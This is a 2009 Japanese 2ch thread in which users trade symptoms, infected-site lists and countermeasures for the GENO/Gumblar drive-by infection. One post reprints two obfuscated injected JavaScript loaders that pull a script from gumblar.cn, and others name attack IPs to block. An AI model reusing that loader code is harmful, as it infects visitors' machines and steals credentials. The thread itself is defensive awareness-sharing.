ごめん聞いたほうがはやいと思って。
素直にググってくるわ
スレ汚しすまそ

>>722
20レス前も見えないのか

>>716
わしも4.0使いなんじゃが・・・更新してみるかのう・・・

>>722
マイコンピュータ⇒Cドライブ⇒WINDOWS⇒system32⇒sqlsodbc.chm
2000とVISTAなら存在しないはず

>>715
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。

●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。

●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。

その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。

もうだめだこれｗ

検索したほうが早いだろｗ

やべえ観光情報を調べたいのに恐くて２ちゃん以外ネットできねえｗ

これはJavaScriptやらFlashやらを全く使わないサイトの復興ありうるな

>>711
Flash Playerは最新にしないと危ない
他も基本的には最新にしたほうがいい
使わないソフトはアンインストールしちまえ

>>735
俺もだｗ
論文書くのに情報集めたいのに

ぱっと見意味がわからんコードがあったら疑えってことか

>>735
旅行の板いけｗｗｗｗｗｗ
2ってホントに何から何まで揃ってると実感できるいい機会だｗｗｗ

携帯でネットすればいいんじゃないか

FirefoxとNo Scriptでjavaを切ってクルージングしなよ

おきゃくさんおおすぎだな

検索ってそっちでしたか
>>731
>>725
ありました。50KBでした

>>742
JavaScriptね

語尾にｗを付けるやつは死ねばいいと思う

.htmlだけじゃなく.htmもやられる？
HP持ちがもし感染したらhtmにすり替え即告知ができるのか聞きたい

検索ってそっちでしたか(ｷﾘｯ

>>740
本当に２ちゃんと専ブラに感謝だよ

AIR_SEってフォルダの中に.nwaって拡張子のファイルがあるのは大丈夫なの

>>747
そんなもん関係ない
自分のOSいれなおしてパスワードを変えなきゃ
サイトを修復してもまた改ざんされるよ

ｆｆとノースクリプト？入れればいいの？
効果あるなら入れてみようかな

どこの同人サイトが感染したんだ？ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>747
htmでもダメ。

引っかかってる不幸なﾔｼをﾆﾔﾆﾔしたいので当スレは誰でもウェルカム・・・！！

今は少しても認知してもらわなきゃって時だろ
お客さん結構

俺がセフレと気持ちよすぎるセクロスしてる最中に何騒いでんだよ？
まだ頑張んなきゃ駄目か？
ちなみにcmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）は勃ちあがった

>>751
ありがとう
かからないようにするのみだな

GENOはもう見ても大丈夫なの？

きんたまみたいにスクショ撮るならニヤニヤできるわな

Reader5とか使ってるやつはアンインストールして、最新を入れろよ。
もしくは何も入れるな。
とっくにサポート対象外なんだよ。

ずいぶん盛況だな
またどっかのサイトが感染したのか？

>>753
今分かってるだけでも

【5月16日1時時点で判明している同人サイト感染状況】
※ここに挙がっていないジャンルも感染が広がっている恐れがあります
エヴァの小説サーチ
ヘタリアの同人サイト
テニミュの同人サイト及びファンサイト
戦国BASARAの同人サイト
リボーンのプチオンリーサイト・同人サイト
おお振りのアンソロサイト
ジョジョの同人サイト
バイオハザードの同人サイト
戦国無双の同人サイト
メガテン（真・女神転生、デビルサマナー、ペルソナ４）の同人サイト
乙女ゲームのVitamin同人サイト
鋼の同人サイト
ガンダム00の同人サイト
幻想水滸伝の同人サイト
忍たま乱太郎の同人サイト
遙かなる時空の中での同人サイト
Fateの同人サイト

サーチも感染してるって報告あるらしいから気をつけろ

カスペ使ってるんだけどavastも一緒にいれても競合しないのか？

botでまーよくここまで

初心者でわからないことだらけだからググって調べようにもネットは自重した方がいいってなると
スレで聞くしかないのかな。あんまり基本的なことだと聞きにくいんだけど

>>759
どう修復したかとか何も発表してないから解決してるか不明だけど
それでもいいなら見れば良いよ

>>755
ﾔｼって最近聞かないな

すまん、meの場合はどう対処すればいい？
cmd→起動しない、regedit→無事起動、sqlsodbc.chm→存在しない
カスペ→反応なし

なんだけど、ぐぐるがおかしいということも多分ない。
cmdは起動してないけど感染してないと見て大丈夫なのか。

>>766
ぐぐるのが怖い場合もまずはスレ内検索をしてみましょう

2chなかったら気がつかない内に感染してたかもと思うと

>>753
まだまだ報告くる可能性あるから素直に同人板池

>>769
Meは最強だろ
何もしなくてよし

>>769
ケーブル切って投げ捨ててくれ

>>769
そのままの君でいて

>>761
アンインストールして何も入れないほうがいいな。
もしくはアップデートせずに放置

>>764
しないわけねーだろバカ。お前みたいなニワカはカスペなんて使いこなせてないんだろうな。

>>769
Meはcommandでやってみ

5はセキュリティホールあるっぽいから
放置はマズいだろ

>>769
まずMeを窓から投げ捨てるべき

>>769 Windows Me の場合. [スタート]−[プログラム]−[アクセサリ] から [MS-DOS プロンプト] をクリックします。

meはよくわからん
meて

サーチエンジンも感染の可能性っておいおいグーグルも使えないってことか・・・

>>763
こえええええええええええええよ

何だこのスレ…優しい

同人関係で感染ひろがってんだ？

公式で感染してるのは小林だけ？

>>770
もちろんしてるって。でも基本的な用語でもわからないとつまずいちゃうんだよ。
ググれないと辛いものがある

正栄は？

広まるのは同人やってる奴のせいだな

>>737
フラッシュは最新だった
AIRとかSVGviewerとか何のソフトだかいつ落としたかも覚えてないorz
アンインスコしとくわ

>>785
みかか他多数の被害が報告されております
マジでフェーズ6レベル

コミケに集まるあの人数が全員サイト持ちだと考えても恐ろしい数だが、
あれ以上に日本にはオタクがいるわけで…
こわい

感染＝OSの再インスコ確定がだるい

>>784
同人は専用スレがたってるから
気づいてる人が多いだけだよ

同人見てるキモヲタなんて感染して痛い目見たほうが良いんじゃね？

>>777
769だけど、commandで黒い窓出た出てきた！ありがとう！
まだかかってないってことだな、これからも気をつける！

>>790
もう危険が危ないのが良く分かった

ごめんなさい

>>786
PC初心者
http://pc11.2ch.net/pcqa/

というか身内でサイトいきかうだろ
濃い範囲で展開されてるんだと思う
んでIE使用者も多そう

つい一時間前までは神戸のインフルにびびってたのに今はこっちのが遥かに怖い

>>788
他は気付いてないだけで広がりまくってそう(((ﾟДﾟ;)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>778
じゃあアンインストールでいいな。
pdfなんぞ見れんでも困らんし。

NTTはやべえだろ…ええー感染してんだ

え、NTT感染してんのかよ

>>791
>全員サイト持ち
ないないないn

普通のサイト開いたら「JS:Redirector-G [Trj]」だって警告でた
4月の半ばだった希ガス
これってGENOかな

NTTじゃねーだろ

>>795
ファイル名変えたら実行できたって報告があったから
それはあんまり意味がないかもしれない
Meを使ってる時点で終わってる

>>798
活用するけどさ、聞きまくるわけにもいかないだろ
初心者は本当に基本的なことでもわからないけど、それを教えてる方はしんどいだろ

>>806
当たりです
三月下旬以降から拡大中だよ

さすがに人が入れ替わってきたかな
まとめwiki置いといたほうがよさそうだな

GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

>>803
>>804
>>142

>>810
3月下旬発症てとこまで豚と一緒じゃないのよ
こわっ

>>732　なるほど

恐らくこれだな

スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト


スクリプト関係には詳しくないからわからないが
素人目でもこれはくさいな

>>810
まじか。avastが開く前に止めてくれたから助かった
「homepage3.nifty〜（伏せとく）」の個人サイトだった

>>806 ぐぐったらこんなんでました ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1020068155

眠れねえ・・・

GENOはトロイとして検出されるの？

眠気が覚めたよもう

知恵袋でさえ怖くなってきたおいらﾁｷﾝすぎる

もう無理だよ。最終的にネットやってる奴は６割感染するな。

怖くて２ちゃん以外開けない

本っ当にここで聞きづらい初心者は
同人板のスレを最初から見たほうが判りやすいと思う
まだ読みもせず質問するのがいるから、拡張子の表示から説明してるレスもある

こんだけ広まってるなら
落ち着くのは何時になるのやら…

そのまま貼り付けたらログから検出反応出るがな(´・ω・｀)

>>816
JavaとJavaScriptを本気で混同してらっしゃる人がベストアンサーとな・・・？

rss readerでブログ読んでても、
対象サイトが感染していると伝染する？

同人から来た奴はスルーしろ。こいつらは感染したって自業自得だろ。

寝れない！寝れない！寝れない！寝れない！寝れない！寝れない！
寝れない！寝れない！寝れない！寝れない！寝れない！寝れない！
寝れない！寝れない！寝れない！寝れない！寝れない！寝れない！
寝れない！寝れない！寝れない！寝れない！寝れない！寝れない！
寝れない！寝れない！寝れない！寝れない！寝れない！寝れない！
寝れない！寝れない！寝れない！寝れない！寝れない！寝れない！
寝れない！寝れない！寝れない！寝れない！寝れない！寝れない！
寝れない！寝れない！寝れない！寝れない！寝れない！寝れない！

同人板のスレ眺めてきた
あれ初心者板より優しいんじゃないのかｗ

首相がオタクのこんな国じゃ

今頃になって慌ててこのスレ読んでる奴は手遅れ

とりあえず全部最新版にしたー！

>>830
ここより親切だなｗｗ

>>827
それ俺も気になった

これだけ広がりやすいウイルスで感染してるかもしれない奴を放置とか危なすぎるだろ

感染してるサイトまとめろよ

同人板小学生が多いイメージになった

>>823
決め付けるなって、調べない初心者もいるけど

>>785
めっちゃ沢山感染しているし、発表して謝罪しているサイトはまだマシ。
俺はとっくに知人には連絡して当分ネットはするなって言っておいた。

ME使ってるやつなんて、とっくに何かのウィルスに感染していると考えた方がいい。
cmd起動とか関係ないレベルだから。

>>809
しんどいのは、初心者が既出の情報にも目を通さない愚かものばかりだからさ。
一度の教えで済むならいいが、実際はわらわらと、すき放題に群がるだろ。

>>780もありがとう
一応kerioも入れてIEOEも使わずにやってきたけど、
Meはそんなに終わってるのか？

やっぱIDでる板はいいなぁーん

>>838
ガキっつうか無知と女が多いから
無知に女が優しく教ちゃうんだろ

感染してるのって・・・

>>523
>>763

この他にもあるの？

>>827
ブログはスクリプトをうめこめないんじゃね
個人サイトの適当生成RSSなら生成方法によるかも
確実に安全とはいいきれないとおもう

ブログとかmixiとかやってる人はウイルスのことちょっと書いといてもいいかもね
知らない人のほうがまだまだ多いだろうし

Meを極限まで安定化させるスレ・Me総合スレ Part 16
http://pc11.2ch.net/test/read.cgi/win/1216631591/l50
に行くと幸せになれるかもしれない

連絡先が書いてないサイトはどうしたらいい？
もう直ってたから連絡する必要はないんだろうけど

初心者なんかスルーしろよ。感染の確認方法すらまともに実行できねぇ上に、同じ質問何度も何度も・・・。
さっさとクリーンインストールしろっての

多分同人のやつらはまだましだよ
一般人の方がさらに知識ないし危機感ないから

>>838
放っておくと自分も被害受けるから

オタクになるのって思春期の中高生がたしかに多そうだな
そりゃこわい

>>847
サンキュ、見て勉強してくる

同人板に行けばこんな俺でも女に優しくして貰えるんですね！
しかもタダで！

>>853
どっちみちMeはMSがサポートを打ち切ってるから
脆弱性があってもほったらかしになってるんだよ
だからすごくあぶないの
サポート打ち切られてるからセキュリティ製品もサポートしてないの

>>845
fc2ブログとか余裕でＳｃｒｉｐｔ埋め込めるよ
自分でだけど

ttp://www.mse.co.jp/ip_domain/
ここで連絡先調べてﾌﾟｷﾞｬｰする

>>854
ほどほどにな

>>854
おまえの先輩の成れの果て
http://changi.2ch.net/test/read.cgi/doujin/1233549740/

これ最終的に何で対応すんだろ

>>854
お前が21歳以上なら801板に池。
「vipから来ました」という魔法の呪文を唱えると
お姉さまがとってもやさしくしてくれるぞ。

>>854
調べてもわからないこと聞けよ

>>844
前スレの>>432のが感染者数だとするとこんだけ

432 名無しさん＠お腹いっぱい。 sage 2009/05/14(木) 14:25:33
google.com/safebrowsing/diagnostic?site=94.247.2.195
2009/04/09(木)　 7560 個
2009/04/17(金)　 8567 個
2009/04/19(日)　11795 個
2009/04/27(月)　15096 個
2009/04/28(火)　13612 個
2009/05/03(日)　13456 個
2009/05/14(木)　12314 個のドメインを感染させています。

google.com/safebrowsing/diagnostic?site=gumblar.cn
2009/05/03(日)　　623 個
2009/05/06(水)　 1108 個
2009/05/07(木)　 1951 個
2009/05/08(金)　 1437 個
2009/05/09(土)　　648 個
2009/05/14(木)　　 24 個のドメインを感染させています。

>>856
埋め込まれてRSSにそのまま配信されたら詰むな

オタクって男のほうが多いんじゃないの？
どうでもいいけど

>>864
わああああ

同人板とおたく板は一緒じゃねえのか

>>863
こりゃあ、エロサイト漁ってるガキはあっという間に感染して終了だな

ブログはキーロガー埋め込めるからそっちでも危ない

／(^o^)＼

>>865
書き手は女の方が多い

>>863
なんという感染力…

>>869
中国韓国台湾のブログは最近ひどいことになってるね
各MMORPGでアカウントハック祭り
genoとは関係ないけど

>>815
それって上に書いてある奴じゃね

感染してないけど、今ftp立ち上げるの怖いから自鯖設置の
ブログだけ更新しようと思ってたけどそれもやばいのかな

踏むとふつーにマルウェア感染するっていう認識＞*.cn

>>512
国交省の地方整備局が１度やられてるんだがなあ
ttp://www.cbr.mlit.go.jp/kisya/2009/0419.html

ほんとあまりニュースにならないね
それこそmixiとかようつべとかネットバンクとかが改竄されないと危機感持たんのかorz

何もしないで素直に専ブラで2chだけ見てるのが一番だな

>>875
ｃｌｉｅｎｔとｓｅｒｖｅｒでは別物のウイルスだと思うよ
ｓｅｒｖｅｒはftpハック
ｃｌｉｅｎｔはハックｓｅｒｖｅｒのjs、つまりGENOウイルス

>>877
マスゴミなんてそんなもん
被害が拡大してやっとぼちぼち取り上げ始める

>>863
難読化されたコードが埋め込まれているサイトはカウントされていないよね？

>>77のこれ何？

フラッシュープレーやーは何もしなくておｋ？

なんだよお前ら
うちの職場普通にME使いだぞ
まいったか

>>883
ログ全部読め

>>883
最新にしろ

>>882
ブロックすべきアドレスのリスト

>>882
PeerGuardian2用ブロックリスト

まあ人命に関わる豚インフルと仮想空間じゃ比べるとねえ
クレカの番号抜かれたら死ねるけど

>>731
Vistaだと、変なところ（\Windows\help\imu\のサブフォルダ内）にsqlsodbc.chmあるよ

>>887
なるほど
ありがとう先輩

>>889
引きこもれば豚インフレは大丈夫
だが、こっちは引きこもってても危険

>>884
genoにやられなくても他のウイルスにやられますがな

>>889
オンラインで使ってたら余裕で抜かれると思うよ

>>888
ありがとう

>>884
踏み台にされてますってそのうち警察がくるかもな

次スレはこのスレを叩き台にしてテンプレある程度纏めないといけないな

インフル怖いなぁ外出もできやしないよ
↓
ネサフでもするかー


アウトー

>>892
ネットしなきゃいいの

>>899
死んでしまうよ

２ちゃんだけしてればいいんだよ

とりあえず、このスレの
>>1-15
までは読んで実行しないと、お話にならない。
>>4は無視。

以下、感染した、とあるサイトのお詫び文（一部、俺が改変）と対処法（あくまで今のところ、明日になれば通用しないかも）

サイトをブラウザーでご覧いただいた方にウィルス感染の恐れがあることが判明しました。
弊社サイトをご利用いただいている皆様には大変ご迷惑をおかけしましたことをお詫び申し上げます。
現在は、改ざんされたページの修正を完了しており、ご覧いただいてもウィルス感染の恐れはございません。サイトの安全管理には万全を期して参りますので今後ともよろしくお願い申し上げます。


※当該サイトには個人情報は保存されておりませんので流出の恐れはございません。
※Windows Vista以降、Macは、感染の恐れはございません。

感染するシステム

Windows XP以前のOS（XP / 2000など）で、Acrobat Reader、Adobe Readerのバージョンが古い場合
（■俺注:ME以前は論外　古いとは、5/12に最新になった9.1.1よりも前の9.1とかをさす。　reader7も8も5/12以降にアップしていなきゃNG）

>>900
死ねばいいの

もはやバージョンアップのためにネットにつなぐことすら怖い

続き。

Web ページの表示に使われるhtmlファイルの一部に第三者のサイトより攻撃プログラムをダウンロードするJava Scriptが埋め込まれました。この攻撃プログラムは、Acrobat Reader、Adobe Readerの脆弱性を利用してパソコンの中にスパイプログラムを送り込みます。
Windows XP、2000とAcrobat Reader、Adobe Readerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
（■俺注:5/12より前の古いバージョンを使っていれば、基本的に感染するが、運良く初期設定を変更していてJavaScriptを切っていれば感染しない　切る方法は>>3　だが、既に感染していれば手遅れ　感染していない人も切る事を推奨）

感染した場合、次の様な問題が発生します（以下はあくまで症状の一例。他は>>1）。

・ヘルプファイルの改ざん
C:\Windows\System32のsqlsodbc.chmファイルを改ざんします。（スパイプログラムのデータ置き場に利用されています。）
ファイルサイズが1000バイト程度の場合は、改ざんされています。

・コマンドプロンプトが起動できなくなる
コマンドプロンプトを起動するとエクスプローラーが再起動します。また、この影響でレジストリエディタが起動できなくなります。

続く。

感染していたサイトがなんの謝罪もなく復活してる件について

avastお前だけが頼りだ

２ちゃんしか見てないのにAdobeReaderが勝手に起動した
もうこわいやだもう泣きそう

同人板と協力したらどうだ

>>908
マジで？

>>910
マジ

だからavast入っててもヒューリスティック最大にしなきゃ意味ないって

>>908
単なる自動アップデートとかじゃねぇのか？

>>911
ブラウザ何？
専ブラじゃないだろ

>>908
2ちゃんだけしか見てなくてそれは無い。

>>908
お前IEで見てるだろ

>>914
jane…

すみませーん

股がスルメ臭いです

どうすれば？

>>908
2chからリンクしてるサイトは2chじゃないとこもあるぞ

>>917
じゃあリンク踏んでないか？
専ブラでありえないわー

スレ速度の推移

http://ranking.sitepedia.jp/graph.html?b=00717&t=1242363241

>>880
>>241が事実なら、そこが対策できたことを確認し、
ついでに自社内をチェックし終えてから、やっと報道する予感。

>>908
単に、自動更新しにいった→UPDATEモジュール拾ったから起動…だといいな

誰か安眠をくれ…

少し前には、広告に紛れてた事が無かったっけか


flashを確認制にしたいんだけど、noscript使うしかないのかな
このくらい、標準で設定用意しておいてくれと思うんだが

阿呆な質問するけど誰か教えてくれ

感染してるサイトにこっちからアクセスすると
自分も感染するというのは分かったけど
じゃあ逆に
感染してる奴が感染してないサイトにアクセスしたらどうなるの？

>>923
ネット接続切れば安眠できるよ

Adobe Flash Player
Adobe Acrobat Reader

この2つアンインストールすりゃ絶対に感染する事ないんでしょ？

絶対はないからこれからもドキドキしててね

>>921
深夜に伸び続けてるのが凄いなｗ

>>925
別になにも起きないんじゃないかな

.が-にかわっているだけでほぼ>>814のコードなんだけど
これって今回のウィルス？

>>927
フラッシュプレイヤーが使えないと不便じゃないか？

>>925
流石にそれでサイトに感染したりしたらもうネットは終わり

>>3 のステップ1をやらずに、>>1 の症状のどれか一つでもある人は、
感染を疑った方がいい。

感染後の対処法も>>902のサイトに書かれているけど、
一度感染したら最後、勝手にどんどんアップデートするマルウェアなので、その対処法で十分かは疑わしい。
>>5のようなこと（ほとんどのセキュリティーソフトが機能しない状態）になってるのも同じ理由。

したがって、クリーンインストールしなおしが冗談抜きで、唯一の現実的な選択。


お詫び文の中にもこのような記述がある↓
このお知らせを作成した2009/5/14時点では、各社セキュリティーソフトでは検出されませんが、
セキュリティーソフトの検出パターンに反映されましたら、検査を行ってください。
下記リンク先のブラウザーから実行できるオンラインスキャン（無料）をご利用いただけます。

トレンドマイクロ社オンラインスキャンを開きます。
http://www.trendmicro.co.jp/hcall/scan.htm


つづく。

>>927
ネットに繋がっている限り感染する可能性があることを忘れるな

だったら「絶対」大丈夫じゃない？

>>927
ウイルスをディスアセンブルして挙動を確認しない限り絶対はない。
解析したとしても亜種に限っては絶対とは言えない。
これは現行判断のすべての材料に及ぶ。
既に亜種にはsqlsodbc.chmを改変しない物もある。当然avastなどのソフトに引っかからない物もあるだろう

Vistaは感染しないのか？
昨日からＩＥが落ちまくっててOpera使ってるんだけどウイルス関係ないのかな
ちなみにソフトはマカフィー

マカフィーなんてさっさと投げ捨てろ

「FTPで接続」した場合はログインIDとパスワードを盗まれ
今後そのFTPサイト内が改竄される可能性がある

マカフィーのメール監視が重くて泣いた5年前

■質問する前にまず>>1からログ全部読め

■「こうすれば大丈夫！安心！」なんて対策は今のところ無い。

とりあえず歯磨いて顔洗ってこよう…

【管理も】同人サイト・GENOウィルス注意【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242391122/

115 GENO sage New! 2009/05/16(土) 00:10:05 ID:GcV0AjPS0
てかセキュリティ板の連中も大したことないなぁ。
ニュー速レベルじゃんｗ

絶対まではいかないにしても2つともあるやつよりないやつのほうが感染しにくいって事でおｋ？
Adobe Flash Player
Adobe Acrobat Reade

vistavistaうぜえ
ID=xxでvistaもおｋなウイルスでねーかな

>>941
俺のレスが引用されてるｗ

予防接種と同様にお考え下さい

>>930>>933
無いとは思ったけど誰かに否定して欲しかった
どうもありがとう

どっちのスレも見てるからちょっと楽しい

ニフティーの奴って感染してたの一人だけ？

【管理も】同人サイト・GENOウィルス注意【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
のりこめー＾＾

>>932
サブマシーンで使うからOK
感染したら即再セットアップ
メインはパスワード入力しまくりだからかなり怖い

テンプレ整備して次スレの頃合じゃね

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

１．Adobe Readerを起動し「編集」メニューの「環境設定」
　　「Acrobat JavaScriptを使用」のチェックボックスをオフ（チェックを外す）
　　OKを押して設定確定後、Adobe Readerを終了。
↓
２．必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
　　設定は SpeedUp - Fast がおすすめ。
　　　注意すべきは
　　　Acroform（拡張子なし）
　　　Annotations（拡張子なし）
　　　これら2つのチェックボックスをオン（チェックが入っている）状態にしておく必要がある。
　　　そうしないと Adobe Reader が起動しなかったりする。

　　　このとき追加作業として
　　　EScript.apiとEScript.JPNのチェックボックスをオフ（チェックを外す）状態にしておくと
　　　より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Readeｒ以外の環境設定をどうするかも各自考える必要があります。

>>950
個人サイトがいくつかやられてる模様
これはニフティーどうこうって問題じゃないよ
他のドメインでも個人サイトで感染してるところはあるわけだし
個人どころか商用でも感染してるわけだけど

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染予防対策

１．Adobe Flash Player の最新版にアップデート
２．Adobe Acrobat Reader の最新版にアップデート
３．NoScriptの導入（Firefoxの導入）
４．Adobe Acrobat Readerの JavaScript 機能OFF
５．危険IPのブロック

随時追加

関連スレに
【管理も】同人サイト・GENOウィルス注意【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
貼っておくといいかも
あっち初心者でもわかるように説明してるし

以下攻撃されたサイト
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html

国内の正規サイト改ざん：攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884


★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】

>>954
>>955
>>957
>>959
に>>958こんな感じでいいかな？

クリーンインストール後は
>>8-9
もしくは、ReaderもFlashも完全にアンインストール。

さらに、Firefox3.0.10をデフォルトブラウザにして
（やり方が分からなきゃ、アンインストールしてインストールしなおせば、デフォルトブラウザにするか？とたずねられるからYES）
専ブラから開くブラウザもFirefoxへ変更。
Firefoxのツール＞アドオン＞プラグインでadobeAcrobatやらFlash含め全部オフ

>>956
>ニフティーどうこうって
それはわかってるんだけど
ニフティーのドメインで何度かトロイの警告でてたからどうなのかと思っただけさ

>>961
参考になりました！

もうやだよ
こんな思いをなんでするのさ

>>945
出なくていいよ、カス

>>962
警告出たならそのとおりなんでしょう

管理人とか感染気付いてない場合ってあるのだろうか

>>931
そう
難読化されたコードはほぼ別々
難読化前のコードはどれも同じだけど

>>967
そりゃあるだろ

テレビで早く報道されたほうがいい
大多数の人たちはこの怖さ理解できていない

Firefoxの大勝利

>>967
確実にそっちのほうが多いだろ

真の勝利者はVista

確かにパソコンが画期的に使いづらくはなるが個人情報が抜かれるみたいな
破滅的なことはないから報道はされないと思われる

>>960
ぶっちゃけ初心者はスキャン結果の見方すらわかんないだろうし
何をどう説明したって無駄な気もするんだが
それでも何も手を差し伸べないわけにもいかんし
時々イラッと来ることもあるが
そこら辺は仕方ないと諦めて
テンプレはそんなもんでいんじゃね？

あと個人的願望↓
痛いニュース辺りで取り上げてくれれば情報は一気に広まると思うんだけどなあ

>>475
もテンプレ頼むわ。

sqlsodbc.chmを改変のハッシュ値も張った方がいい。
俺は忘れちまった。
既にブロックするブラックリストにGumblar.cnを登録しちまったから、検索できない。
誰か頼む。

あと、プリフェチを使わない方法も。

ああ、1000までに書ききれない。

痛いニュース、頼んだぞ

>>974

抜かれるぞ　よゆうで
お金も抜かれるかもな

Adobe Flash PlayerとAdobe Readerの違いがわからないんだけど
すべてのプログラムにAdobe Readerしか無かったってことはAdobe Flash Playerインストールしてないのかな
どこにあるかどうやって探すんですか？

キャプチャもとりほうだい

なんでもできる危険なウイルスだぞ

よし、いつもネットばっかしてて描けないしこういう時こそ絵を描こう

>>968
ありがとうございます
相手の管理人に連絡とってみます

週末恒例俺のエロサイト巡りの時間を返せ！

firefoxのアドオンで停止すべきなのはreaderとshockwaveflashでおｋ？

あらゆるパスワード抜けるし大概のことはできるぜひゃっほーー！！

こわすぎる

では、立ててくる。
補完宜しくです。

地雷がどこに埋まっているか分からない状態でネットサーフィンか・・・怖いね。
このウィルスに関してはアンチウィルスソフトもあてにならないし・・・。
(((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

普段行かないサイトには関わらないほうがいいね。
普段行ってるサイトでもセキュリティーが駄目そうなところには行かないほうが良さそう・・・。
(((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>978>>980
超危険なのね
早く警察か公務員が感染しないかなぁ
そうすれば、公になる

>>979
フラッシュゲームが出来なければ無い

web制作会社も感染してるらしいので
これから公式サイトとかもがんがん感染しだすんじゃねーの

豚インフルエンザどころの騒ぎじゃねえな・・・。

股が臭い16の夜

>>990

どういう意味

誰かが宣言無しで立ててた

せんせーい
2つもすれたってまーす

重複ｗ

>>984
そうだけど、Javaもしょちゅう狙われるから切った方がいい。
最新は13ね。

というか、せめて沈静化するまでは、全部切るのが一番いいんだが・・・。

重複してんじゃん

てか向こうジャンル晒しなんか心底どうでもいいからドメイン晒してほしいナー

>>989
フラッシュゲームやったことないです
avastが有効ってレスもあるのでAdobe Flash Playerと一緒にインストールしたいんですが
その二つはググっても大丈夫ですかね。。

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。